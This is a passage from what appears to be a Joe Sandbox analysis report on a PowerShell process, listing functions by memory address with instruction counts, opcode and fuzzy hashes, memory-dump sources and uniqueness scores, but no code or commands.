                                                                                                                  • Opcode ID: 654a59872090a60e8a59f65e189bb410e535fe40e63a67f1336b00d5965d064a
                                                                                                                  • Instruction ID: c9195002c3e71b94a0bcf6a4588b4fbb78045bd184a9682a0b49599d1289ca31
                                                                                                                  • Opcode Fuzzy Hash: 654a59872090a60e8a59f65e189bb410e535fe40e63a67f1336b00d5965d064a
                                                                                                                  • Instruction Fuzzy Hash: 2F31D43090CA4C8FDB19DB68D8496F9BBF0EF66311F0482AFD049D3252DB64A805CB91
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB6A1670 Relevance: .4, Instructions: 359COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1471 7ff9bb6a1670-7ff9bb6a168a 1474 7ff9bb6a1647-7ff9bb6a1656 1471->1474 1475 7ff9bb6a168c-7ff9bb6a169a 1471->1475 1481 7ff9bb6a165d-7ff9bb6a166e 1474->1481 1478 7ff9bb6a1657 1475->1478 1479 7ff9bb6a169c-7ff9bb6a18f0 1475->1479 1478->1481 1517 7ff9bb6a18f6-7ff9bb6a1901 1479->1517 1518 7ff9bb6a197b-7ff9bb6a19ba 1479->1518 1481->1471 1519 7ff9bb6a1903-7ff9bb6a1916 1517->1519 1520 7ff9bb6a1918-7ff9bb6a1932 1517->1520 1531 7ff9bb6a1977-7ff9bb6a1978 1518->1531 1532 7ff9bb6a19bc-7ff9bb6a19cc 1518->1532 1519->1520 1528 7ff9bb6a1934-7ff9bb6a1947 1520->1528 1529 7ff9bb6a1949-7ff9bb6a1976 1520->1529 1528->1529 1529->1531 1535 7ff9bb6a1979 1531->1535 1536 7ff9bb6a19ce-7ff9bb6a19d8 1532->1536 1535->1535 1537 7ff9bb6a19df-7ff9bb6a19e7 1536->1537
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2473544356.00007FF9BB690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB690000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb690000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e82af1218afdf67e02d5dfc34ac0f0acf9565bd1fdccb3ea712e37a4258456ba
                                                                                                                  • Instruction ID: 5bce5e005d8561fcccc83389cee583d340d19d52ce350f9e9a12b35509a6204f
                                                                                                                  • Opcode Fuzzy Hash: e82af1218afdf67e02d5dfc34ac0f0acf9565bd1fdccb3ea712e37a4258456ba
                                                                                                                  • Instruction Fuzzy Hash: 07B10632D0CB5A5BE611FB7C74962E57BE0EF0227871980FBD1CECA093EC5879454A89
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB530640 Relevance: .2, Instructions: 217COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2464311547.00007FF9BB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB530000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb530000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: eb30a39c13cb4aa12df7cce58eee87bf66fe2f4a84bde37e9f52ad52dcbe057c
                                                                                                                  • Instruction ID: 8d7934481b508a045b64e69884e93afc8106c3b67ce5adcd9a5b159c3e0f7b75
                                                                                                                  • Opcode Fuzzy Hash: eb30a39c13cb4aa12df7cce58eee87bf66fe2f4a84bde37e9f52ad52dcbe057c
                                                                                                                  • Instruction Fuzzy Hash: 5A51A072A0C90D4FEB94EF2C94557B977E2FF99350F140176D10EC32E2DDA9A9418782
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB53D758 Relevance: .1, Instructions: 143COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2464311547.00007FF9BB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB530000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb530000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3041a832fab1141179fad1fc4c7b204802f0ce4627056efdad38ffb45433506a
                                                                                                                  • Instruction ID: 112870af6f1070644ac55d35a76ef887a35a5f2a56015487712ad70d922797be
                                                                                                                  • Opcode Fuzzy Hash: 3041a832fab1141179fad1fc4c7b204802f0ce4627056efdad38ffb45433506a
                                                                                                                  • Instruction Fuzzy Hash: A741B071A1CA598FEB95EF2C94547E87BF1FF99310F0400B6D00ED32D2DDA969418781
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CF092 Relevance: .1, Instructions: 136COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ed1f92e44bdb691ce16829bcb20b013597db39ceeec7d9a9d9b7e1c36bf856a2
                                                                                                                  • Instruction ID: 5c03baf83da0accbfaf319b680013a798ed3220654d62ac3c68f75d79a962e50
                                                                                                                  • Opcode Fuzzy Hash: ed1f92e44bdb691ce16829bcb20b013597db39ceeec7d9a9d9b7e1c36bf856a2
                                                                                                                  • Instruction Fuzzy Hash: 6F41A130A09A0A4FEB95EF68C0947B973F2FF95315F04407AD90DC72E2DE6AB9458740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB6A19F8 Relevance: .1, Instructions: 89COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2473544356.00007FF9BB690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB690000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb690000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fb32a9195ac9a91112072fa13bfeffcf47c9b1f519c3d843f573a0a39ce39e70
                                                                                                                  • Instruction ID: ae5dae730237d1f5ea43f92d3745db8875033997526180b50798859e287ea98f
                                                                                                                  • Opcode Fuzzy Hash: fb32a9195ac9a91112072fa13bfeffcf47c9b1f519c3d843f573a0a39ce39e70
                                                                                                                  • Instruction Fuzzy Hash: A921E121D1CD8E8FEA59EB2860917F6A7E1EF56320F4540BAD14FCB1D6ED687D028780
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB69962C Relevance: .0, Instructions: 44COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2473544356.00007FF9BB690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB690000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb690000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 38cb2c107e42fc1022b5a08aefc4d0a1ce844cb8c77ad7f864a40b9d99897d39
                                                                                                                  • Instruction ID: 7246e42ac270889b1369d8cfa7a5123e975fa5b3c41f14369497d83c830c2fd4
                                                                                                                  • Opcode Fuzzy Hash: 38cb2c107e42fc1022b5a08aefc4d0a1ce844cb8c77ad7f864a40b9d99897d39
                                                                                                                  • Instruction Fuzzy Hash: 0CF04F303298094FDB88EB1CD465AF573D2FBA9325B2001BED44AC7296DE26AC41CB80
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Non-executed Functions

                                                                                                                  Function 00007FF9BB3B81CD Relevance: 2.1, Instructions: 2123COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9e3aebd14c935be7b4a17e051de8ea1553bd662b8e5ab46f95ff757bd1af8c7d
                                                                                                                  • Instruction ID: 9413e9bbced82b302d88503eeaca79d9358bfb1ebeeaebdc46d9bab85ad0daf1
                                                                                                                  • Opcode Fuzzy Hash: 9e3aebd14c935be7b4a17e051de8ea1553bd662b8e5ab46f95ff757bd1af8c7d
                                                                                                                  • Instruction Fuzzy Hash: D2E28270A196484FD369EF3C805536AB7E2FF89308F1049BDD18ECB2E6DA79E9418741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3B000A Relevance: 1.8, Strings: 1, Instructions: 581COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: 3cdf2047cb672e767fe34bc11125070fb52432f39a7c0a2a7f7cdbd29db6cf7c
                                                                                                                  • Instruction ID: ebaeb2fce818677ac76aa036434a047b562a70c9593c4257841f0ef13d46b44f
                                                                                                                  • Opcode Fuzzy Hash: 3cdf2047cb672e767fe34bc11125070fb52432f39a7c0a2a7f7cdbd29db6cf7c
                                                                                                                  • Instruction Fuzzy Hash: F012E630A0D6498FD3A5DF3C806576ABBE1FF8A304B1446BAD14DCB2E2DE78A9458741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB691B28 Relevance: 1.7, Strings: 1, Instructions: 451COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2473544356.00007FF9BB690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB690000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb690000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: `
                                                                                                                  • API String ID: 0-2679148245
                                                                                                                  • Opcode ID: 0aed0e2129fc5f68e930b0f7ae83a5d846e60554c4179fa061f4cc908dda4080
                                                                                                                  • Instruction ID: e54d852dc1cc47156e3f904f5632e797756230713104c67b9a2f1b13b6e79bd0
                                                                                                                  • Opcode Fuzzy Hash: 0aed0e2129fc5f68e930b0f7ae83a5d846e60554c4179fa061f4cc908dda4080
                                                                                                                  • Instruction Fuzzy Hash: DBD1EF30A0D6499FE768DF28845963577E1FF4A720B2004BED5CEC72E2DE69BC028741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3B1CAD Relevance: 1.6, Instructions: 1633COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fadde93b8c174a61fef4c1e1c4c62c1b47b7f3a1604e8bea97ad8553d29868e1
                                                                                                                  • Instruction ID: 8a7ca70900bb24d7bfe9b3ac2a30990299193551a2e6b134d5505e6a57abbeb7
                                                                                                                  • Opcode Fuzzy Hash: fadde93b8c174a61fef4c1e1c4c62c1b47b7f3a1604e8bea97ad8553d29868e1
                                                                                                                  • Instruction Fuzzy Hash: 15B25E30A196494FD3A8EF3C805536AB7D2FF89209F1086BDD14EC76E6DE78E9428741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3B5B51 Relevance: 1.5, Instructions: 1514COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: df3885ca2a5a22490075e27a8361ac5751f4f795e8f09464f9779d41c1e66e33
                                                                                                                  • Instruction ID: 1fce3b2fb71d4233bf3e18cf29a2418a679794524748f2965c9688be13990da8
                                                                                                                  • Opcode Fuzzy Hash: df3885ca2a5a22490075e27a8361ac5751f4f795e8f09464f9779d41c1e66e33
                                                                                                                  • Instruction Fuzzy Hash: C8B28330A1D6484FD368EF3C8465669BBD2FF89304F1486BEE14EC72E2DE78A9458741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3BB32D Relevance: 1.5, Instructions: 1452COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0ca9bcd03934cb17186776bbd551596dd40df92b200fc2d138bbfc2db5f8f343
                                                                                                                  • Instruction ID: 7d2b60d7833000fd54ea3ff697582eb32f53356732a0b9e4b6724741ca736b9c
                                                                                                                  • Opcode Fuzzy Hash: 0ca9bcd03934cb17186776bbd551596dd40df92b200fc2d138bbfc2db5f8f343
                                                                                                                  • Instruction Fuzzy Hash: DDA2F731A0D6454FD364EF3C90552AABBE1FF8A318B1485BEE18ECB1E3DD78A8418745
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3B763D Relevance: 1.3, Instructions: 1273COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1fd140c0636027d6a1cab8a41a91cef521b2aef905970a181296fed11cb5f9f8
                                                                                                                  • Instruction ID: dadc159c44c6a5a68a9a3b3f94400096bf9d2fdcb4f965bf43f4cf7600394425
                                                                                                                  • Opcode Fuzzy Hash: 1fd140c0636027d6a1cab8a41a91cef521b2aef905970a181296fed11cb5f9f8
                                                                                                                  • Instruction Fuzzy Hash: 6F82B330A1D6488FD369EF3C8455269B7D2FF89308B1449BDE14ECB2E2DE79E9428741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3BCD3D Relevance: 1.1, Instructions: 1116COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1838927128f5223db72fc436d9232dc74c182472c21866b6c79de6d37e1dd4ea
                                                                                                                  • Instruction ID: 80506cda2d509dec2edb877a2ec082ff81b7b3eae8026456679f6255bb5148a2
                                                                                                                  • Opcode Fuzzy Hash: 1838927128f5223db72fc436d9232dc74c182472c21866b6c79de6d37e1dd4ea
                                                                                                                  • Instruction Fuzzy Hash: AB729130A196494FD369EF3C805536AB7D2FF89308B144ABED14EC72E6DE78E9428741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3B111D Relevance: 1.1, Instructions: 1102COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a484331c48b1d5c0bc6d6e11a9be6dced4f8068da51b0696ec52b987e4e7843b
                                                                                                                  • Instruction ID: b2668c6d3a2c662041923ae3f63d8094cac64e34611ef434729cf8e5faaab4b9
                                                                                                                  • Opcode Fuzzy Hash: a484331c48b1d5c0bc6d6e11a9be6dced4f8068da51b0696ec52b987e4e7843b
                                                                                                                  • Instruction Fuzzy Hash: E872A030A1DA494FD368EF3C805536AB7D2FF89304B1446BEE14EC76E2DE79A9428741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB546FA5 Relevance: .9, Instructions: 904COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2464311547.00007FF9BB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB530000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb530000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 84597f03104d7882525ee3b2c8849760e692abfe253ab302e9d90cd0fa8e9039
                                                                                                                  • Instruction ID: 14da90cb34cc5c333b72a9215380d2cff4f7fbb0b77a8822f47e6bb62806c76b
                                                                                                                  • Opcode Fuzzy Hash: 84597f03104d7882525ee3b2c8849760e692abfe253ab302e9d90cd0fa8e9039
                                                                                                                  • Instruction Fuzzy Hash: 8B520120A1CD8A4FEB98EB2C94457B977D1FF55310F5040BAD04EC71DBDEA9B9428782
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3BC389 Relevance: .9, Instructions: 871COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6c3f6f60906f774f6cbb1dafac94b9e6c9936688c59634e0f3ae1989b4152fab
                                                                                                                  • Instruction ID: 3b3a253da20d76fa5c983efbcd1c587764ba9564ebc7ab5fedc2e32c3252b042
                                                                                                                  • Opcode Fuzzy Hash: 6c3f6f60906f774f6cbb1dafac94b9e6c9936688c59634e0f3ae1989b4152fab
                                                                                                                  • Instruction Fuzzy Hash: A352B330A096494FE3A9EF3C805576ABBE2FF89304B5445BED14EC72E6DE78E9418740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB69EC75 Relevance: .8, Instructions: 807COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2473544356.00007FF9BB690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB690000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb690000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3317db47608d90760f4d2094aa1c73e35a839bd65cd58ed278823181897fafe2
                                                                                                                  • Instruction ID: 24c6ceeb66fab418fe556f394a92bbf6688f210aa2b4d8d96f963dcd0634e14e
                                                                                                                  • Opcode Fuzzy Hash: 3317db47608d90760f4d2094aa1c73e35a839bd65cd58ed278823181897fafe2
                                                                                                                  • Instruction Fuzzy Hash: 8042BF30E1CA498BEB58DB6C94557B977E1FF58310F5041BAD18EC32D2DE68BD428741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3B98FD Relevance: .8, Instructions: 765COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e5ccd123367b057b0b5d78882d76c050d394f2683b4905a17588820a88298c65
                                                                                                                  • Instruction ID: 7f89da776aa630acee50553acfd42728364db1ccb58965b09147e80acb71fc0a
                                                                                                                  • Opcode Fuzzy Hash: e5ccd123367b057b0b5d78882d76c050d394f2683b4905a17588820a88298c65
                                                                                                                  • Instruction Fuzzy Hash: 5C32B53061D6484FD369EF3C846526ABBD2FFCA214B1446BED14EC72E2DE78E9418741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3B6F3D Relevance: .7, Instructions: 739COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2d364e5fe8371e396480b34f94c4883d49c702ed878ee33435aadf7ab4df42d6
                                                                                                                  • Instruction ID: f083c4e81661eadffc13e35b3c5bc4c846bc19e58876f31ff96633675c6b4f35
                                                                                                                  • Opcode Fuzzy Hash: 2d364e5fe8371e396480b34f94c4883d49c702ed878ee33435aadf7ab4df42d6
                                                                                                                  • Instruction Fuzzy Hash: 6732B5306096498FD7A8EF3C806576AB7D2FF89304B1445BED14ECB2E2DE78E9418741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF45783 Relevance: .7, Instructions: 709COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2427705825.00007FF9BAF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9baf30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1ee2944d6538d1a726455ae76b5b338a6366859c8828536547f20c3645d11e7e
                                                                                                                  • Instruction ID: abafff53c3b11327bfa0c305ce41d7bc54195f072ff20c7d7be0a22f381cb070
                                                                                                                  • Opcode Fuzzy Hash: 1ee2944d6538d1a726455ae76b5b338a6366859c8828536547f20c3645d11e7e
                                                                                                                  • Instruction Fuzzy Hash: 78220541B0DA894FE398E7BD28667B46AC2DFDA650F4441FEE44EC76D3DC887C054681
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB6A12AF Relevance: .7, Instructions: 671COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2473544356.00007FF9BB690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB690000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb690000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 77caca5fd180e08d5eee4bcf114082ff3c6b2e059651f40d7766f4916f5abebc
                                                                                                                  • Instruction ID: c99ad98a900d31a560e287f12e6dbe924e87905de49973b410ae27de750a38bb
                                                                                                                  • Opcode Fuzzy Hash: 77caca5fd180e08d5eee4bcf114082ff3c6b2e059651f40d7766f4916f5abebc
                                                                                                                  • Instruction Fuzzy Hash: 46220637C0CB5A6AE611FBBC74552E57BA4EF03378B1584B7D0CE8A093EC5878458E89
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CDF10 Relevance: .6, Instructions: 640COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 116e8cc1ba58178046a043e6d63fe1d600ef405a25fcb7c0b1fa5ca3af163dfa
                                                                                                                  • Instruction ID: eca919a5c5c863becdf348ffd51d3bd05870ad50b756ff6d10cfe2df71a5b832
                                                                                                                  • Opcode Fuzzy Hash: 116e8cc1ba58178046a043e6d63fe1d600ef405a25fcb7c0b1fa5ca3af163dfa
                                                                                                                  • Instruction Fuzzy Hash: 7712EF32A0EA894FE794DF6C94557B97BD2FF99340F0400BAE54DC72E2DE68B9028741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CACCE Relevance: .6, Instructions: 601COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5db6262676df3970a3544dad55eabeea0e4635d68f03fcef67aa436407a8af85
                                                                                                                  • Instruction ID: bc7c0790fcba1c15a8b6585c2f397ec06cd37ab95c8662233a88c8234ef5f846
                                                                                                                  • Opcode Fuzzy Hash: 5db6262676df3970a3544dad55eabeea0e4635d68f03fcef67aa436407a8af85
                                                                                                                  • Instruction Fuzzy Hash: 5B12FA2060D6884FD3A5DF3C8490A7A7FD1AFCE214B5487BAE089C75EBDE78D9069301
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB6A13B0 Relevance: .6, Instructions: 590COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
